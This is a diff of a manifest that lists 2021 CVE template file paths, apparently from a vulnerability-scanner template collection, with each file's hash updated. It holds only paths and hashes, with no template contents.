-http/cves/2021/CVE-2021-30151.yaml:23ff34b42e7a58b543bb847cf320a50cb6eafe86
-http/cves/2021/CVE-2021-3017.yaml:2c79fd12435159ee2f1c40870797cbc50f680331
-http/cves/2021/CVE-2021-30175.yaml:274f47fd3abcf932aa4b9399a4857489fd7b9ef3
-http/cves/2021/CVE-2021-3019.yaml:99bfd570846ca34a60cbe107aaf8db3ce5e02082
-http/cves/2021/CVE-2021-30213.yaml:43dcd73f722655a4a8ba637224531746de494b5b
-http/cves/2021/CVE-2021-30461.yaml:79983e8205d90984eaca16cf922c01cddcb90e9c
-http/cves/2021/CVE-2021-30497.yaml:45f7ecc760ee9957d53ff32e5b8ea288c9307dc8
-http/cves/2021/CVE-2021-3110.yaml:e3a86f33e9475acdfa157b6acfc035a4c9258e4e
-http/cves/2021/CVE-2021-31195.yaml:fc83552b280d2f7f787a7b7676fc0b1df7c31040
-http/cves/2021/CVE-2021-31249.yaml:ae0059e0907e9c6e0d50f86d7a45fb7cc5425353
-http/cves/2021/CVE-2021-31250.yaml:14b29c248d60b56f64ce3c63186fcc5bde527e48
-http/cves/2021/CVE-2021-3129.yaml:06da4592456dfda7dc697b040ebe7991299a6e8f
-http/cves/2021/CVE-2021-31537.yaml:47cc4b8e2b29dd33ca66cce926ad507d827569ad
-http/cves/2021/CVE-2021-31581.yaml:f1604b3b83a96d379e08d081370deb959318c068
-http/cves/2021/CVE-2021-31589.yaml:c27158577757c8e3a16c4d8dd487c5f3b181bae9
-http/cves/2021/CVE-2021-31602.yaml:bb6443deaf318971ee05d6f2c5828ce9ab4f30e0
-http/cves/2021/CVE-2021-31682.yaml:d180577f489c97252386bd51766fce56ddd22bb7
-http/cves/2021/CVE-2021-31755.yaml:33b28c7bed9fca1c94b13e95ec2345c5037d7777
-http/cves/2021/CVE-2021-31805.yaml:5c0230327780bf91e033cb2b2329c3c23774afcd
-http/cves/2021/CVE-2021-31856.yaml:8060d13d6968b9a090fec7818d1ae4f451f02fbd
-http/cves/2021/CVE-2021-31862.yaml:b033be3c0afad0834782cc9d18e0be9a7c1195ae
-http/cves/2021/CVE-2021-32030.yaml:d486f2ffa62effecdd13473e31128d31438a8acb
-http/cves/2021/CVE-2021-32172.yaml:a28231fbfe33bc70e8997bdf6f09a6319e87adb2
-http/cves/2021/CVE-2021-3223.yaml:d7c9372cb8dc67ec9915278a69d134cca73b697e
-http/cves/2021/CVE-2021-32305.yaml:3a5adadba80ddfed8d91370a6365bf80628a55c1
-http/cves/2021/CVE-2021-32618.yaml:93f46f40418121080c15c175a42d88cfb3206aba
-http/cves/2021/CVE-2021-32682.yaml:94e038060d7b951e554472843cb08766789acc38
-http/cves/2021/CVE-2021-32789.yaml:182c6e84a60bdde3d4114ac9a6b3bdc3c9c4a449
-http/cves/2021/CVE-2021-32819.yaml:d696149d98eeb65e8edca08b85e283a6172b9852
-http/cves/2021/CVE-2021-32820.yaml:75956e1a2e3333e336b27ab50ad4b6bee28d82b3
-http/cves/2021/CVE-2021-32853.yaml:249cf4dcb72cce5921c83609616be4ca3984a227
-http/cves/2021/CVE-2021-3293.yaml:f9ead4b26f0dcfc1852de84c2ec3ca9a97b96b70
-http/cves/2021/CVE-2021-3297.yaml:b75d968106dedc5ff934bee171c745a1ecf0c501
-http/cves/2021/CVE-2021-33044.yaml:096994f3c5320bfb869233f3b3e8daf978340c35
-http/cves/2021/CVE-2021-33221.yaml:361f4518c00e35d6f66152f3026a4d7c7e3a73db
-http/cves/2021/CVE-2021-33357.yaml:36564d05c97c322fbb47e15f7462fbb5b1f7e2d2
-http/cves/2021/CVE-2021-33544.yaml:a0667297e5561cb72d966a3cfd73271ad3469ca4
-http/cves/2021/CVE-2021-33564.yaml:83f4a6cecb8199c9b8f1f1f4c91f907c8ead5126
+http/cves/2021/CVE-2021-29203.yaml:e918aada039e30f07d8bbbd558f0a72d7a138a25
+http/cves/2021/CVE-2021-29441.yaml:c326b4a945167cf1d43e6411ef322151861e77d2
+http/cves/2021/CVE-2021-29442.yaml:54a4abb1c6919640073a67ad7c0b52fd405d1a10
+http/cves/2021/CVE-2021-29484.yaml:3d42d5a72130ba9a59fa84c6fbc4f6d1353f7aec
+http/cves/2021/CVE-2021-29490.yaml:0b9820c5b4b54df7ed60703849930d8301636cb4
+http/cves/2021/CVE-2021-29505.yaml:4ea8003268ab195d7499c2eaf850f629bd289578
+http/cves/2021/CVE-2021-29622.yaml:04660ca648ebfc933303789b09c652e885ed0927
+http/cves/2021/CVE-2021-29625.yaml:485d28752445801d0de02506e969eee938d4401e
+http/cves/2021/CVE-2021-3002.yaml:2ed00489cc4d5833a5e795318353a535c5de959b
+http/cves/2021/CVE-2021-30049.yaml:1f75a3bcbc461647f85624fba736a623ffa6dd0d
+http/cves/2021/CVE-2021-30128.yaml:3eb3b1eed2b05255e8ee4153ab8f64856132fd3f
+http/cves/2021/CVE-2021-30134.yaml:e08719154b2f62a6717585e25349877c3be621c5
+http/cves/2021/CVE-2021-30151.yaml:9048d6d6de8693ffa219583b755a69da69f4ee2c
+http/cves/2021/CVE-2021-3017.yaml:a3cf9aa550b792268e2c2771ed9176bca8f3d92b
+http/cves/2021/CVE-2021-30175.yaml:0e38a2d974b144d6f8df2efe2361938d70c71cc1
+http/cves/2021/CVE-2021-3019.yaml:bf0a3f6f068d91a3c7b69ebb0603f4a83adae829
+http/cves/2021/CVE-2021-30213.yaml:644d0276d0791a04bf065d44e018d8efd62934e2
+http/cves/2021/CVE-2021-30461.yaml:9c4de6f9798dd40bb36941eef061d7ea3dcde822
+http/cves/2021/CVE-2021-30497.yaml:ab2e2b72ec953aa2866be35c4539e8088ee2ea91
+http/cves/2021/CVE-2021-3110.yaml:7b3bd87c017375e6bbb0ff02e6afcbdd50695819
+http/cves/2021/CVE-2021-31195.yaml:b364f46f589d501bc8847bf23e5259da622af113
+http/cves/2021/CVE-2021-31249.yaml:14e43d5dcda543eed3dbc4588640426aefca25cf
+http/cves/2021/CVE-2021-31250.yaml:40b162d66ca50ac6e19c0a28329ea17d447a0e29
+http/cves/2021/CVE-2021-3129.yaml:12c561bf6decc661618f620e18206434328d7dd1
+http/cves/2021/CVE-2021-31537.yaml:76820461751eabb37f30efff1ed99a0fd94d3181
+http/cves/2021/CVE-2021-31581.yaml:6c922d44ae5d035dbe0eff7f286fc69eb1a58cd2
+http/cves/2021/CVE-2021-31589.yaml:8fbc016bad43b5ccdfd69658091fae1c317f22e1
+http/cves/2021/CVE-2021-31602.yaml:0ca85da95bfa08d06c663a0fa9feaab49885524d
+http/cves/2021/CVE-2021-31682.yaml:40b873dcf567c30f83362c6c5ea253d1ff352f67
+http/cves/2021/CVE-2021-31755.yaml:c4b801f00d346d212c88646e4c234d1e9b5b3214
+http/cves/2021/CVE-2021-31805.yaml:f76414cabb7341495c84f2048fe27e470c591d0a
+http/cves/2021/CVE-2021-31856.yaml:a7599711dd40f3e0de6ea228659199a8f3b8406f
+http/cves/2021/CVE-2021-31862.yaml:62d4c62df0ae9398c113b22f7f31877918d9bd9c
+http/cves/2021/CVE-2021-32030.yaml:a12220f3683299365495c0ade29f50b273d6a48b
+http/cves/2021/CVE-2021-32172.yaml:5b6dadfaf1be4569a1a68b68fd8686721e8bb1f7
+http/cves/2021/CVE-2021-3223.yaml:157bba6ccbbce9117ad742b98e06d2eed754dc50
+http/cves/2021/CVE-2021-32305.yaml:10209c2a6d620874767d00ff2ed13fd680d09adf
+http/cves/2021/CVE-2021-32618.yaml:0b899f6378aa1475b0a5a16c49fc98a6ba82a0bd
+http/cves/2021/CVE-2021-32682.yaml:d53ec79b1568d38e9811d96df24da5a741848f42
+http/cves/2021/CVE-2021-32789.yaml:29e8e9f86ca8b1e8615f001cac209024f5d6ba37
+http/cves/2021/CVE-2021-32819.yaml:35403d09e774716fa6b4f14d30a5919b0e10b823
+http/cves/2021/CVE-2021-32820.yaml:c730da2831aa2041cc9c3e541a26107ad1202f7a
+http/cves/2021/CVE-2021-32853.yaml:6b148655c4e50524e142c3c26f001e60c680c81d
+http/cves/2021/CVE-2021-3293.yaml:4a98d7ac9fd09a814c9003e30496c2db8800c977
+http/cves/2021/CVE-2021-3297.yaml:a3d3a106db354cdb1cdba2822cf6ae8c29075ebe
+http/cves/2021/CVE-2021-33044.yaml:b79541a1a8185e1b8d4ded599805a761df257384
+http/cves/2021/CVE-2021-33221.yaml:4ee2b7430d04595365ec770e23ff0ceab42ad1ac
+http/cves/2021/CVE-2021-33357.yaml:5ee3098eda1176aabb711d34ce9fad9f88334e9d
+http/cves/2021/CVE-2021-33544.yaml:ded4d8cd157b9187ab71cb07bfda155a20fd73b5
+http/cves/2021/CVE-2021-33564.yaml:2abd8868f44872d18c037c387227362318874c2f
 http/cves/2021/CVE-2021-33690.yaml:14d86eac503f66ebe47c2621047831606bd9582d
-http/cves/2021/CVE-2021-3374.yaml:c1a3d0428ec7fbf9bc11a1877080792b45f178a6
-http/cves/2021/CVE-2021-3377.yaml:b1babd7bcaca323b2ee7ac2a6ffd5fe9e5eacc0b
-http/cves/2021/CVE-2021-3378.yaml:90a59d3ca8ee4fc5f7fafcc21de71f76e241eea6
-http/cves/2021/CVE-2021-33807.yaml:1f3770b1608cdcfe06e7bea210d03f8d2740280f
-http/cves/2021/CVE-2021-33851.yaml:b968be1e89944b3f1ccc05460e159e716f7b4350
-http/cves/2021/CVE-2021-33904.yaml:09436cd42420ea06a3ae208cdf2f114f8f871b3e
-http/cves/2021/CVE-2021-34370.yaml:b5c72887b5f91f0bb9bc0356f67cb165bbbaa28a
-http/cves/2021/CVE-2021-34429.yaml:6d49581ca553640a2c380800d19a871982220b60
-http/cves/2021/CVE-2021-34473.yaml:6fce04506098265c909c4b3bc5f8857870c845f4
-http/cves/2021/CVE-2021-34621.yaml:4e3850e9b4f432c0273738902e14145ac9a10440
-http/cves/2021/CVE-2021-34640.yaml:fefac3b727e2635287fdffd34756bb74f0457b77
-http/cves/2021/CVE-2021-34643.yaml:cf0630d8b071ff770b2d0fd57f49554870386a5e
-http/cves/2021/CVE-2021-34805.yaml:cba9631b70831bf190ee91a954a225ac9a1ceb39
-http/cves/2021/CVE-2021-35250.yaml:9bcfe45335a786d84e2f7adb8daed3e39e81a35d
-http/cves/2021/CVE-2021-35265.yaml:c865b29741ec76d9e65b1dc095006df1daed6066
+http/cves/2021/CVE-2021-3374.yaml:33b8846d990e63e9c11d7ee301eddc4ce0d01e7b
+http/cves/2021/CVE-2021-3377.yaml:956715c9823c4d8d676c9894d5c8ffcb4a05229b
+http/cves/2021/CVE-2021-3378.yaml:79891ba4b0fecf0cc6f1ecfab32c591aeb9bd475
+http/cves/2021/CVE-2021-33807.yaml:17db0cdfd2fbfb8da80ac8d0ecc5e555c24d3e6d
+http/cves/2021/CVE-2021-33851.yaml:7eb08709eda585b60aca6e2d4589844c751f9a18
+http/cves/2021/CVE-2021-33904.yaml:dc87749928bb1119c21f340f1155c70a0cc8e41b
+http/cves/2021/CVE-2021-34370.yaml:bbea5ceb72e10f12936511a60a42b03cc3279939
+http/cves/2021/CVE-2021-34429.yaml:05a33980a4221a8aaf78a1ada86752c533d86a76
+http/cves/2021/CVE-2021-34473.yaml:a7c77893700793f192d2d738442a88229ab22a07
+http/cves/2021/CVE-2021-34621.yaml:e83294f04a5ca9ff61aee7322a56880a770ff982
+http/cves/2021/CVE-2021-34640.yaml:6d9f1a32e4a08e3143c45465bf1845a9acb0e914
+http/cves/2021/CVE-2021-34643.yaml:48f86033ac6a2627bbb54fed90c0ff1af3f36fa2
+http/cves/2021/CVE-2021-34805.yaml:8717c0269b483db5d2c0e02e21369c53f8247300
+http/cves/2021/CVE-2021-35250.yaml:d4c834f691f406e21f911b2e0c0254fd1a041025
+http/cves/2021/CVE-2021-35265.yaml:3ab024780525ef630178f29888123d450abd769d
 http/cves/2021/CVE-2021-35323.yaml:4a197cb1b4b3f7eaf078d6fc7e00a8dc3f6ed73b
-http/cves/2021/CVE-2021-35336.yaml:d38e477607620816fc8c90664f893a38591c8530
-http/cves/2021/CVE-2021-35380.yaml:0a038b2f20e35ae84b7af93069fc0876cd2e867e
+http/cves/2021/CVE-2021-35336.yaml:39f39cb471798f46f80d0b52eebb4d7659e0642c
+http/cves/2021/CVE-2021-35380.yaml:8a49cc29025b0547e4a60ac4ed1e8ef32365843d
 http/cves/2021/CVE-2021-35395.yaml:4796169e30e53ea0bd0212b92d9392f3de57a8b1
-http/cves/2021/CVE-2021-35464.yaml:5f3c773c9e982b3ed8ea86aca2702bc81b9664b5
-http/cves/2021/CVE-2021-35488.yaml:38bd336a504d1754fd08424fc6f8abf4d00a64ad
-http/cves/2021/CVE-2021-35587.yaml:84fc1589ba1e75301f9f211ade37881272e78c35
-http/cves/2021/CVE-2021-3577.yaml:78508ff2f764b7e45049bf7cba4a740c577aea2b
-http/cves/2021/CVE-2021-36260.yaml:81cc0443f429fe2e0862530c3e826baf8b6cb093
+http/cves/2021/CVE-2021-35464.yaml:ec0e45f137c9b64f00e52939dfb202c1bfdc8956
+http/cves/2021/CVE-2021-35488.yaml:a30a3dfe2e75a8a3af9d5a250858376a2c7af445
+http/cves/2021/CVE-2021-35587.yaml:207056686804000b23c303053d55e04200927f05
+http/cves/2021/CVE-2021-3577.yaml:982755018ea2e8fb8f02d2ff6eba9fc821f6b7e0
+http/cves/2021/CVE-2021-36260.yaml:9eb2151da851b8bcf632b55fc1cde4e548ca2446
 http/cves/2021/CVE-2021-36356.yaml:0a58b725588c8840fbf0fcc4d628eb9734026531
-http/cves/2021/CVE-2021-36380.yaml:4cc2b757b79a4de93fa7b0193fab0d69faf3e316
-http/cves/2021/CVE-2021-36450.yaml:c924441e2ba3c744aa9c1f9af3100f2e1c21686b
-http/cves/2021/CVE-2021-3654.yaml:69fbff4f3825e9226b7e97da98c8a77e108dc726
-http/cves/2021/CVE-2021-36580.yaml:90e75e2fec8cb0cd003e23bd733d186367b1d3c6
-http/cves/2021/CVE-2021-36748.yaml:0ec60784c74b2510497954a1d37f6cae05186312
-http/cves/2021/CVE-2021-36749.yaml:1361ba6af0e1c1f0bcd4a70a740d85fe404b694d
+http/cves/2021/CVE-2021-36380.yaml:a05ad61b46e24bdca202a26240bad48ca30b2859
+http/cves/2021/CVE-2021-36450.yaml:b306aab986630c228e868111e67819dc518ddbd5
+http/cves/2021/CVE-2021-3654.yaml:e1e9e4277b827d1c29e06467d477fdc660e5c40b
+http/cves/2021/CVE-2021-36580.yaml:90beb14f1f12c078d00510d8deca70445fb6b423
+http/cves/2021/CVE-2021-36748.yaml:13be4d6df349193c113fe27ff6b81c2dac88bb68
+http/cves/2021/CVE-2021-36749.yaml:8059f33c86823bcdb8fb3b081160689ab7601e63
 http/cves/2021/CVE-2021-36873.yaml:512a889341aeb256d8aa40826fe61eca416fb921
-http/cves/2021/CVE-2021-37216.yaml:1cb6ad9b38528ec04544393a977af869b1b738da
-http/cves/2021/CVE-2021-37304.yaml:098d5dbf53d848f5b668f106d11231058b3909b0
-http/cves/2021/CVE-2021-37305.yaml:bc1fa0964e047ef4f9bf3e17c129f186779147c3
-http/cves/2021/CVE-2021-37416.yaml:9a65d487aedde1f098ca9e2ed66da9bfd2174ef1
-http/cves/2021/CVE-2021-37538.yaml:4c78cf378a60b14869edb72155718e2ab563f355
-http/cves/2021/CVE-2021-37573.yaml:e957918f299c393bc33df2ef53c7d1670dc73dcd
-http/cves/2021/CVE-2021-37580.yaml:f6ec98885bc60f5ce8c509af237f7c3530b7aafa
-http/cves/2021/CVE-2021-37589.yaml:50923cba1e2baaa72cde63c898c037a6467ff456
-http/cves/2021/CVE-2021-37704.yaml:922e677ea4da2d408909f90fa02a63bd885e6f16
-http/cves/2021/CVE-2021-37833.yaml:98e27c7425b5739c33a47ac68357ebb59ac6b66e
-http/cves/2021/CVE-2021-38314.yaml:d24fb415eb8a6866cb8467dbb2151b4d745ade82
-http/cves/2021/CVE-2021-38540.yaml:767934767b2bbf4082006cc8059ad1d1323f9b9c
-http/cves/2021/CVE-2021-38647.yaml:fbb9d6f2b514c64942c7cf1cdd29166bb56b75a5
-http/cves/2021/CVE-2021-38702.yaml:c5d24cfe9fb7cff13dca11aa417ddce2c90c3d84
-http/cves/2021/CVE-2021-38704.yaml:10e14bc581f72503544699b3139800f65e2ec7ec
-http/cves/2021/CVE-2021-38751.yaml:22cf6ff2fb800643437e0e0f4bd6867d22fce117
+http/cves/2021/CVE-2021-37216.yaml:22510be3a3dc76794a81507c7d0504e1fc4f9245
+http/cves/2021/CVE-2021-37304.yaml:8a91fbc5e90c239c1d975cfa20b2687812d62555
+http/cves/2021/CVE-2021-37305.yaml:addf9de561935e6fd60d22ed3e540123fbed8ca9
+http/cves/2021/CVE-2021-37416.yaml:435de37d5f226ba7f18c1d0463f6703f8c2d5fef
+http/cves/2021/CVE-2021-37538.yaml:2a60f7933cc36946ffaabe1ce0a8f71b1dee9f98
+http/cves/2021/CVE-2021-37573.yaml:1eedc6297c9936c8315695c5beeee40d02a56e00
+http/cves/2021/CVE-2021-37580.yaml:0f3edcbb4674ba70f20ca1a1c9959aafae2bdc16
+http/cves/2021/CVE-2021-37589.yaml:d08a4f6702dc9904cd27d425f7c9065624efd579
+http/cves/2021/CVE-2021-37704.yaml:74a48e388e4ec2273d50c1a9513bd0ddda785b9d
+http/cves/2021/CVE-2021-37833.yaml:d9e3efad50484b1a8807e7cb267842efde8619e2
+http/cves/2021/CVE-2021-38314.yaml:7d786ece43ecfb967f9ee276ebc40036d76334ae
+http/cves/2021/CVE-2021-38540.yaml:27d619d1f744b1a3170ad94bc3eb3c005edca8a3
+http/cves/2021/CVE-2021-38647.yaml:d5014015f1a1700b14dfe6b967593eeda3574d7f
+http/cves/2021/CVE-2021-38702.yaml:668da82d799cc7398ff0b28baace6e8facf41eb1
+http/cves/2021/CVE-2021-38704.yaml:a8946ef453985028669e2e2d8c4512105e14934c
+http/cves/2021/CVE-2021-38751.yaml:5d89756baad06f072dd06d79842319e7eb2b8599
 http/cves/2021/CVE-2021-39141.yaml:25c9fb8b840b78fd66562484dc50941eb0e7103e
-http/cves/2021/CVE-2021-39144.yaml:591e632d8ec8d618ca78249f858263c687ad0e24
-http/cves/2021/CVE-2021-39146.yaml:978315ecc72509b97cce4dc17ed8fd245fce1972
-http/cves/2021/CVE-2021-39152.yaml:b6022723b5b3e26d4933b54ed394154347b9db3b
-http/cves/2021/CVE-2021-39165.yaml:0348e84326e6bdf49048d88e86f21ba180f60517
-http/cves/2021/CVE-2021-39211.yaml:8d2ce4f738cb072e4af3034dc19cdad3550f7285
-http/cves/2021/CVE-2021-39226.yaml:9c384cd24f1380a98a83b70a341b6db1261885d9
+http/cves/2021/CVE-2021-39144.yaml:97cf210d7a81942202358a9f6ffd21a5d6bb97a1
+http/cves/2021/CVE-2021-39146.yaml:dd289a79efbb0f1795c4d3ce5bc7268918dbc149
+http/cves/2021/CVE-2021-39152.yaml:28667a29331e6bb7dbf9059c7bb2fb8332a8dc14
+http/cves/2021/CVE-2021-39165.yaml:54f6d9d23d0268dd37ce67e4bab1da93aeab0702
+http/cves/2021/CVE-2021-39211.yaml:5746d467a323e27b0989889a757c4ba6c741d65b
+http/cves/2021/CVE-2021-39226.yaml:a31de74e4a0653c9deade6575da3a07918898ea2
 http/cves/2021/CVE-2021-39312.yaml:06d0af609f207eeccb0babd1784823c091fdc0ab
-http/cves/2021/CVE-2021-39316.yaml:c801e1066ba6dc6d72ccb61dfaf3b8d1decdfe3b
-http/cves/2021/CVE-2021-39320.yaml:669c57ef56e979d35e502a48e184e2a01593d7fe
-http/cves/2021/CVE-2021-39322.yaml:1bc9aaf3909201c7ed39f84e9ccfc9ae9b952f34
-http/cves/2021/CVE-2021-39327.yaml:a03e92459769ef2fdb9e6cc76f1ca765d2f14556
-http/cves/2021/CVE-2021-39350.yaml:f8341ed5a08089c62939f2ae75de49b8d4a998b4
-http/cves/2021/CVE-2021-39433.yaml:f13b8570470daeb1d9571419020865ab7227b263
-http/cves/2021/CVE-2021-39501.yaml:b1b3524038e24aa4f3415e0d2011258507fb379a
-http/cves/2021/CVE-2021-40149.yaml:b010cf43e04fb72ea36ac3ccc58c2df94b837fd4
-http/cves/2021/CVE-2021-40150.yaml:deee3bbe13107884311ddcaf7ab2f13ac7ae7b52
-http/cves/2021/CVE-2021-40323.yaml:7e07e2810e8190c3b753122697588ad57f656717
-http/cves/2021/CVE-2021-40438.yaml:e71923368dfb708398a6432963344edbe5ca3902
-http/cves/2021/CVE-2021-40539.yaml:619992b61bc22246ab2bac0b9f890c75580e762e
-http/cves/2021/CVE-2021-40542.yaml:d3de8caf77796d81979d92624fe042ef5236eea3
-http/cves/2021/CVE-2021-40661.yaml:25e342052c09d2d3eb95e9cdce4eae6ab80ca7b3
-http/cves/2021/CVE-2021-40822.yaml:199b7af6164a29eef06a06de89632c1209cdc6e7
-http/cves/2021/CVE-2021-40856.yaml:e04b56753f3145c30d246565db48928c33948dbc
-http/cves/2021/CVE-2021-40859.yaml:42b8c4e73d99d0120189ffcce65350fabc8aa2b4
-http/cves/2021/CVE-2021-40868.yaml:becaf3409adbe4b9a3b618b3172ec3a5fc9a0d26
-http/cves/2021/CVE-2021-40870.yaml:c0c90a529eafc6525fdf79c1353ec604b3939f82
-http/cves/2021/CVE-2021-40875.yaml:f5346c996850cba1ce25b5fccd64d54138d7bbdc
-http/cves/2021/CVE-2021-40908.yaml:9034dcef7f1adf78793930ff538c6dea1c9feeca
-http/cves/2021/CVE-2021-40960.yaml:5aa0d52a3283937e18b33b5534af2cf91468420b
-http/cves/2021/CVE-2021-40968.yaml:fad40216ef244e1373b3f8d8fad1b5d618b08893
-http/cves/2021/CVE-2021-40969.yaml:81614e57138cd9cf54bbe10390d487b313e28b94
-http/cves/2021/CVE-2021-40970.yaml:eef28e4322e9e411e207dd1b913886cbf4295f35
-http/cves/2021/CVE-2021-40971.yaml:ec78caf06104f79f8eac16f58c20b7e7a8b91f51
-http/cves/2021/CVE-2021-40972.yaml:e12c6463a345a4494948172084c24c25bffe81ef
-http/cves/2021/CVE-2021-40973.yaml:584e6caf68040c40b3639f90c14c431dd3e7d08d
-http/cves/2021/CVE-2021-40978.yaml:8ebe1dfc66831f20ec156bc0bd1960dd3f7f7dad
-http/cves/2021/CVE-2021-41174.yaml:2c11703b32640b42054bc064c5fce52da6d59311
-http/cves/2021/CVE-2021-41192.yaml:bcf984023fa3ff6908b0790441d90c269ee1f8c2
-http/cves/2021/CVE-2021-41266.yaml:b1d965a07feee6eb8a8e1b8b9524f39ed71e7c96
-http/cves/2021/CVE-2021-41277.yaml:ddd0ab5a51a28aaf655d4ae8c7ad76783d921408
-http/cves/2021/CVE-2021-41282.yaml:87bf4bf816aa4ada265d2b6500b22494b2f2fddd
-http/cves/2021/CVE-2021-41291.yaml:ecf3cdcd10f1763f11da1e05ed6a9d38a3cbc791
+http/cves/2021/CVE-2021-39316.yaml:6c3c10df9e55a5fd15e1cfeaf8841e4b38fae227
+http/cves/2021/CVE-2021-39320.yaml:47c8d37e115de8f70994345c04eda8f233d00bbb
+http/cves/2021/CVE-2021-39322.yaml:a643c1afca38b29c3f4947762cddbc3a7b3c1bb0
+http/cves/2021/CVE-2021-39327.yaml:40a0f00ae103fdeb549e64298a6fd89f05c08b6d
+http/cves/2021/CVE-2021-39350.yaml:d67708ef90a99350002b99cfad0f70035ced3254
+http/cves/2021/CVE-2021-39433.yaml:8ef46f1b7ba151475606f58386b0035f6e3da07c
+http/cves/2021/CVE-2021-39501.yaml:79b09abfb6089ada18c03675e35d0c8b455ad1e7
+http/cves/2021/CVE-2021-40149.yaml:df65fc5d779a3d5d1ee2f32b22484a48eb5d5563
+http/cves/2021/CVE-2021-40150.yaml:d9142899aabc315e351053010f3ad8eadc002e85
+http/cves/2021/CVE-2021-40323.yaml:f33fdc78237e55ec1aca792a2ede85d23164d337
+http/cves/2021/CVE-2021-40438.yaml:da6642e1ce6347178f5f053e2ce02005dd3fe71f
+http/cves/2021/CVE-2021-40539.yaml:2419bc36d429ca52660474e29a4192ea4981c316
+http/cves/2021/CVE-2021-40542.yaml:4977ec5a6dcab706539603632453b555a7dc8313
+http/cves/2021/CVE-2021-40661.yaml:522d5d17c8073104e5ac1da77d350a3f87bd4da8
+http/cves/2021/CVE-2021-40822.yaml:32cb1844e20d40b7921663bbba2a0c63efa62497
+http/cves/2021/CVE-2021-40856.yaml:3835bf7addcd82d9b7e1811f11cda0406b371d34
+http/cves/2021/CVE-2021-40859.yaml:a722317c65ae1f8f51235dda9936fb13111d7773
+http/cves/2021/CVE-2021-40868.yaml:651c2cb91c6a80f3e43afb31289ec0b3c53d657a
+http/cves/2021/CVE-2021-40870.yaml:ebc554edc4a8feff36f891311e61a9217014d92d
+http/cves/2021/CVE-2021-40875.yaml:9dcb60e392a006008beaeca05c79d696c21fa57b
+http/cves/2021/CVE-2021-40908.yaml:d7821861ac22cfb0de3d0b22bb6f8dc9fea3eb59
+http/cves/2021/CVE-2021-40960.yaml:dce7b525c274a4f9b52f98949d1cb7b1df56e06e
+http/cves/2021/CVE-2021-40968.yaml:28625be67269b7b6ab03473c8a5e68a84807272e
+http/cves/2021/CVE-2021-40969.yaml:2cebc816fdaaa71b014f07384f9189d30b6f94f3
+http/cves/2021/CVE-2021-40970.yaml:1e97d259a35d3b30a4cf17511e404886c7b50f52
+http/cves/2021/CVE-2021-40971.yaml:956b0772efd87ed7fe8beb50aeb4a0dc38dee66a
+http/cves/2021/CVE-2021-40972.yaml:7f6b692b0ede9f02084d385562882440e55000db
+http/cves/2021/CVE-2021-40973.yaml:12ccf9abbdd1eacaea19e41c1888a770859e40ea
+http/cves/2021/CVE-2021-40978.yaml:d362e562790f260372d87e640ad55415e664a3b4
+http/cves/2021/CVE-2021-41174.yaml:83af2cf9356faad91d2276202e96af0e85f1932b
+http/cves/2021/CVE-2021-41192.yaml:9b13b96315c9d5657be42ab1ffe6992a7cd5a85f
+http/cves/2021/CVE-2021-41266.yaml:c6146f1aed61a76fb31bc8aa0976224794056523
+http/cves/2021/CVE-2021-41277.yaml:a89aba135d38d0d50e1607e54abffa55b4af1fd5
+http/cves/2021/CVE-2021-41282.yaml:8c0a042b45585fbd303469ccce175cc453aed292
+http/cves/2021/CVE-2021-41291.yaml:9b18cde3b6335d8c22f378a43c6703832e4b0dba
 http/cves/2021/CVE-2021-41293.yaml:9bcd10e63ed99d31defcb7c6bbc8e6e77126f2a6
-http/cves/2021/CVE-2021-41349.yaml:313e0f4a860759bc15217e5b88e9e24eaeeec5b0
-http/cves/2021/CVE-2021-41381.yaml:c42a1b01e7439bc647831b9919c2ad6896d8b676
-http/cves/2021/CVE-2021-41432.yaml:9064f093e99c69f20a5a70d302c242ef9795d6a1
-http/cves/2021/CVE-2021-41460.yaml:0cfa1a925cb46d892ef59c0ab087c9b56d18953d
-http/cves/2021/CVE-2021-41467.yaml:c6fdf2b71485fef339758e83ec820835184ba5c7
-http/cves/2021/CVE-2021-41569.yaml:eefdb9633b92d0169c13b9ab8037c9362ba409db
-http/cves/2021/CVE-2021-41648.yaml:48dcb4675da67043bbaececa89e41a724f4e1367
-http/cves/2021/CVE-2021-41649.yaml:257384b6d98a77c15a767138463b394588df42e5
-http/cves/2021/CVE-2021-41653.yaml:b5023ebae31868a3324eba37fd61f444033bdc1f
-http/cves/2021/CVE-2021-41691.yaml:a725a36529e74579ffcd7f9662c07a8f8c265b12
+http/cves/2021/CVE-2021-41349.yaml:2da5208acc2ce81dd37af731688f8e67baecdcff
+http/cves/2021/CVE-2021-41381.yaml:3668f67c5ebf893f0405bfb11d36797e1d060093
+http/cves/2021/CVE-2021-41432.yaml:5c0ece40e9e84ea10b9eaea9c1f1e787593eb479
+http/cves/2021/CVE-2021-41460.yaml:5ad590b1515145c0eb1c5f4999714943a6c8c1a8
+http/cves/2021/CVE-2021-41467.yaml:72ff2480582ca743b09e26cef945f53bf5cc46d9
+http/cves/2021/CVE-2021-41569.yaml:644f3a4fa7a751b190dac2d9c71d14806ca07320
+http/cves/2021/CVE-2021-41648.yaml:9eb18e38a77d3739ebec6f404effe1642c6b6559
+http/cves/2021/CVE-2021-41649.yaml:5b28368b8af05469a4526548c4a2ab969900dfc0
+http/cves/2021/CVE-2021-41653.yaml:600acc0b50bac0c9d4ff654223fe3a51a0391b30
+http/cves/2021/CVE-2021-41691.yaml:7d5d8e695f4d0d588eb3dfdeca53d0d7b97ea972
 http/cves/2021/CVE-2021-41749.yaml:255b5f56fefa5543411a4b29c56b3f55a12bec10
-http/cves/2021/CVE-2021-41773.yaml:896ddf6a56d2e14b82bd796b6be29c8fd07bc418
-http/cves/2021/CVE-2021-41826.yaml:7c3244223663c0025a89ef2ebca2e31e86a575b8
-http/cves/2021/CVE-2021-41878.yaml:3b96307777203581780dfb8c107148b650d123f5
-http/cves/2021/CVE-2021-4191.yaml:c5d4923f19cde32addb62a873b6ebc2bc648537b
-http/cves/2021/CVE-2021-41951.yaml:8f89f90178827b544c3c8520cf547b7ee9691024
-http/cves/2021/CVE-2021-42013.yaml:4214af9edd5167d3fbda7224a93b88e6d48a9898
-http/cves/2021/CVE-2021-42063.yaml:cc6d27b20b8f20520a7c8e55ccf65bd530dd92fb
-http/cves/2021/CVE-2021-42071.yaml:284c121c18deae15d7f033708db92d9543b81dbe
-http/cves/2021/CVE-2021-42192.yaml:b043729c5347df942880bdaf8352e69642e40f89
-http/cves/2021/CVE-2021-42237.yaml:9f3ebbad0a59801aeb043bab5cd50bd56c90b101
-http/cves/2021/CVE-2021-42258.yaml:3785ce580575e53fd88f8dd3235cea3ac71177b2
-http/cves/2021/CVE-2021-42551.yaml:b6f03240fedd0271b64bd3d787531eb9eea26a52
